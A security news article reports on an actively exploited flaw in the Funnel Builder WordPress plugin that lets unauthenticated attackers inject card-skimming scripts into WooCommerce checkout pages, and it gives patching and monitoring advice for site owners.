A severe security vulnerability in the WordPress plugin Funnel Builder is being actively exploited in real-world attacks to inject malicious scripts into WooCommerce checkout pages, enabling attackers to steal sensitive payment information from online shoppers.
The flaw impacts the Funnel Builder plugin developed by FunnelKit Funnel Builder and is present in all versions prior to 3.15.0.3. Security researchers say the plugin is used by more than 40,000 e-commerce websites worldwide.
Unauthenticated Access Enables Script Injection
Cybersecurity researchers at Sansec report that the vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into checkout pages. This is achieved through a poorly secured internal function exposed via a public endpoint that fails to verify user permissions.
As a result, attackers can directly write malicious code into plugin settings that are automatically loaded on every checkout page.
The issue has been patched in version 3.15.0.3, and site administrators are strongly advised to update immediately.
Fake Analytics Scripts Used to Hide Skimmers
Attackers are disguising malicious payloads as legitimate tracking tools, such as Google Tag Manager scripts, making them difficult to detect during routine security checks.
Once injected, the scripts silently activate a payment skimmer that captures sensitive customer data, including credit card numbers, CVV codes, billing addresses, and other checkout details.
In some observed cases, the injected code connects to external infrastructure and establishes communication with attacker-controlled command-and-control (C2) servers to retrieve updated skimming instructions tailored to each compromised website.
How the Attack Works
According to researchers, the vulnerability stems from an exposed checkout endpoint that allows internal methods to be triggered without authentication or authorization checks. This design flaw enables attackers to submit specially crafted requests that overwrite plugin configuration settings.
The malicious code is then stored in the plugin’s “External Scripts” configuration field, which is automatically executed across all checkout pages.
Security analysts warn that this type of weakness provides a direct path for “Magecart-style” attacks, where payment skimmers are deployed across legitimate e-commerce platforms.
Payment Skimming Campaign Targets WooCommerce Stores
The ongoing campaign is part of a broader trend of web-based payment theft operations targeting e-commerce platforms powered by WooCommerce, a widely used WordPress plugin ecosystem.
Experts note that attackers are increasingly using legitimate-looking analytics tags to blend into normal website behavior, reducing the likelihood of detection by site owners and security tools.
Security Recommendations for Website Owners
Security teams recommend that administrators take immediate action to mitigate the risk:
- Upgrade Funnel Builder to version 3.15.0.3 or later
- Review plugin settings under “Settings > Checkout > External Scripts” for unknown or suspicious entries
- Remove any unauthorized scripts or tracking code
- Monitor checkout pages for unusual JavaScript activity or external network calls
Broader Trend of Website Supply Chain Attacks
The incident reflects a growing wave of attacks targeting content management systems and plugins to gain access to high-traffic websites. Similar campaigns have been observed in other platforms, including Joomla-based sites, where attackers deploy remote loaders to dynamically serve malicious content and spam.
Security researchers warn that these evolving techniques allow attackers to modify website behavior in real time without further access to the compromised system.
Conclusion
The exploitation of the Funnel Builder vulnerability highlights the continued risk posed by insecure plugin architectures in widely used web platforms. With attackers actively targeting checkout systems to harvest financial data, prompt patching and continuous monitoring remain critical for e-commerce site operators.
